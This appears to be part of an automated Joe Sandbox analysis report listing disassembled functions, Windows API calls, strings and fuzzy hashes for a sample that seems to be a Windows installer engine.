                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                                                                                                                                                                  • String ID: logutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1365068426-3545173039
                                                                                                                                                                                                                                                                                                  • Opcode ID: face0b2a02d25cd2415f6409b5f6dcb7381b75efb3e1fd4cf40361d33ad0747c
                                                                                                                                                                                                                                                                                                  • Instruction ID: ec86693a07c1935beded75815e74316280c812fb124b4619b83b758de9e0afb5
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: face0b2a02d25cd2415f6409b5f6dcb7381b75efb3e1fd4cf40361d33ad0747c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F11BF32A00129EBDF29AF948D05EAF7B68FF54710F054029FE04DA172D7318E60D6A0
                                                                                                                                                                                                                                                                                                  Function 00886B88 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00886B32,00000000,00000003), ref: 00886B9F
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00886B32,00000000,00000003,00000000,?,?,?,?,?,?,?,?,?,00886F28,?), ref: 00886BA9
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • msuengine.cpp, xrefs: 00886BCD
                                                                                                                                                                                                                                                                                                  • Failed to set service start type., xrefs: 00886BD7
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ChangeConfigErrorLastService
                                                                                                                                                                                                                                                                                                  • String ID: Failed to set service start type.$msuengine.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1456623077-1628545019
                                                                                                                                                                                                                                                                                                  • Opcode ID: 94d06a6c69376e17c530e8baa059618cf034ce867160106da6a689af8fc9c288
                                                                                                                                                                                                                                                                                                  • Instruction ID: 361dc9afd4ed543911475824390381dcecc4c13f7a3ea35c679e768834749f5a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 94d06a6c69376e17c530e8baa059618cf034ce867160106da6a689af8fc9c288
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 85F0E533A4923637D72136999C09E8B7E48FF02BB0B110321FE38FA2D1FA558D1086E1
                                                                                                                                                                                                                                                                                                  Function 00893C76 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00893D6E
                                                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00893D78
                                                                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(80003CDD,?,?,?,?,?,?), ref: 00893D85
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 21ee23a08580a5daaae376d5b070e6c20b541e0da3a6703ddaeb61db1476e104
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2e4b2f3cfdb9d39ffdbe868158cd1ddd8816c3b74a11d520e044096525c1d60e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21ee23a08580a5daaae376d5b070e6c20b541e0da3a6703ddaeb61db1476e104
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A231B17491122CABCB21EF69D989B88BBB8FF08710F5041EAE40CA6251E7749F818F45
                                                                                                                                                                                                                                                                                                  Function 00897B87 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID: /
                                                                                                                                                                                                                                                                                                  • API String ID: 0-2043925204
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6d8539fcda6a0a65b6ceef7e5c863f93d54eff505bfa288f79330218382fd991
                                                                                                                                                                                                                                                                                                  • Instruction ID: d4eecd4a615cc6b4c0881b13a786b6f9670d44af8b8dee520bc22ac0cc34842a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d8539fcda6a0a65b6ceef7e5c863f93d54eff505bfa288f79330218382fd991
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C4126725042186FDF20AFB8CC89EBB77B8FB80714F144668F905D7180E6319E81CB50
                                                                                                                                                                                                                                                                                                  Function 0089A560 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4f8f95bc5e7c876d0a1a0b2598f8063104ee7b1299e502c05a036ee161ca1c45
                                                                                                                                                                                                                                                                                                  • Instruction ID: 664dca5353bfb22ebbf64756a30e0d88341a77de91f07b0d82c826996ef3e27b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f8f95bc5e7c876d0a1a0b2598f8063104ee7b1299e502c05a036ee161ca1c45
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE02FB71E002199FDF18DFA9C8806ADBBF5FF88314F29816AD919E7384D731A941CB91
                                                                                                                                                                                                                                                                                                  Function 008A3A5F Relevance: 3.1, APIs: 2, Instructions: 58memoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A3BF1: RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,008A3A8E,?), ref: 008A3C62
                                                                                                                                                                                                                                                                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 008A3AB2
                                                                                                                                                                                                                                                                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 008A3AC3
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AllocateCheckCloseInitializeMembershipToken
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2114926846-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 36da0370f19c44ff8d5ba15958ef14d04a28a33bec49e228f18e95dd6bd6632e
                                                                                                                                                                                                                                                                                                  • Instruction ID: e0b1a3c45167799f40fd6b622ba06ff502352f8ba8ea751bdae0af7f3a2b71d8
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 36da0370f19c44ff8d5ba15958ef14d04a28a33bec49e228f18e95dd6bd6632e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7911097190062EAFEB10DFA4DC85BAFB7B8FF09344F50482AB641E6551E770AA44CB61
                                                                                                                                                                                                                                                                                                  Function 008A4440 Relevance: 3.0, APIs: 2, Instructions: 44fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(0088923A,?,00000100,00000000,00000000), ref: 008A447B
                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 008A4487
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2295610775-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5391f5c8a1d3758eeeeee448498c277afc3d0a6d55e1fb5b338a8d9320d2f354
                                                                                                                                                                                                                                                                                                  • Instruction ID: 73c63e4a5decfbae03c0c421ad5c0493002891ac0bc4b1faa40fc7039983f6fc
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5391f5c8a1d3758eeeeee448498c277afc3d0a6d55e1fb5b338a8d9320d2f354
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9801D63160160C6BDB10EFA9ED89EAAB7ACFBC6315F000065F914D3241D774AD498B58
                                                                                                                                                                                                                                                                                                  Function 00892C18 Relevance: 2.7, Strings: 2, Instructions: 214COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID: 0$comres.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 0-3030269839
                                                                                                                                                                                                                                                                                                  • Opcode ID: f7a880ec5967ec64a90054ca813bf1243ddeae79b496adee3d9f08ad155e7dd2
                                                                                                                                                                                                                                                                                                  • Instruction ID: 79d79dfaf7cb50bd7035f39a7758f8b9f3c94a5ffd7dd5eff51b28b6226b545c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f7a880ec5967ec64a90054ca813bf1243ddeae79b496adee3d9f08ad155e7dd2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA516960200B0D7BDF39BB6C859ABBF2799FB16348F1C0919F843DB692C605EE418356
                                                                                                                                                                                                                                                                                                  Function 0089EE7C Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0089EE77,?,?,00000008,?,?,0089EB17,00000000), ref: 0089F0A9
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: eb6b3367cad02e46d1dce37fbcb9ec6e0d9a884febdfef21ea950e269fe5cc02
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3a75c83b613bce2ec3e6c57ca0c6b13c7b8259662db98396f1be88c15088bf05
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb6b3367cad02e46d1dce37fbcb9ec6e0d9a884febdfef21ea950e269fe5cc02
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 83B15D31610609DFDB19DF28C486B657FE0FF45364F2986A8E999CF2A2C735E981CB40
                                                                                                                                                                                                                                                                                                  Function 0088EC07 Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0088EC20
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2325560087-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 802536425c2034ceff616d658f9e76c84781a529dde51451fc0745352e049da8
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1308ffb9755250e88acf25a4755916b43d1644338e709ba8b1eac32298d667f6
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 802536425c2034ceff616d658f9e76c84781a529dde51451fc0745352e049da8
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D519CB1E14309CBEB28DF59D885BAABBF5FB48304F14816AD405EB291E375AD00CF91
                                                                                                                                                                                                                                                                                                  Function 0088E9DC Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0002E9E8,0088E131), ref: 0088E9E1
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 91c76b86df691ef50e45f062fc58c351c6f23ef79f75dbb719d2ad7da4396953
                                                                                                                                                                                                                                                                                                  • Instruction ID: b8bfa7b8d7ba75251dc14834c90a70fa89658c59761d1d48485ec66f7fd59a44
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 91c76b86df691ef50e45f062fc58c351c6f23ef79f75dbb719d2ad7da4396953
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                                                  Function 0088FB89 Relevance: .5, Instructions: 481COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: 06c3b35d8a471b57672fa62e20d700288261d96208bd146003cd170cd18403d8
                                                                                                                                                                                                                                                                                                  • Instruction ID: b618df0b5686e67cb8a60852bd83971719db7430cca22ccc21c2312f0d70532a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06c3b35d8a471b57672fa62e20d700288261d96208bd146003cd170cd18403d8
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE02C4321085A20BDF2D5A39847003B7BA1FA423B171E47ADD9B6CF1D7EE20E564D760
                                                                                                                                                                                                                                                                                                  Function 00890B6F Relevance: .4, Instructions: 352COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: 713254dbb735968c7063ac25a152bc56bcdf297f8f834348282298adb5de4d15
                                                                                                                                                                                                                                                                                                  • Instruction ID: 96a53ac933b84d1c2742eb136bb0d5ea5b8310de086362e1f6e2b25ed443529d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 713254dbb735968c7063ac25a152bc56bcdf297f8f834348282298adb5de4d15
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FBC161331091A20FEF6D5239847417EBBE1FA927B131E179DD4B2CB1D5EE209535EA20
                                                                                                                                                                                                                                                                                                  Function 008907AA Relevance: .3, Instructions: 347COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: f3c7a540a95456d95b2f03679edd2d49eac6f1621006280bdad19664e1d0b21d
                                                                                                                                                                                                                                                                                                  • Instruction ID: 6c13df24a428cbe3ce367fc24f02ce5cf5526301abb725c0be6735ed1006b185
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3c7a540a95456d95b2f03679edd2d49eac6f1621006280bdad19664e1d0b21d
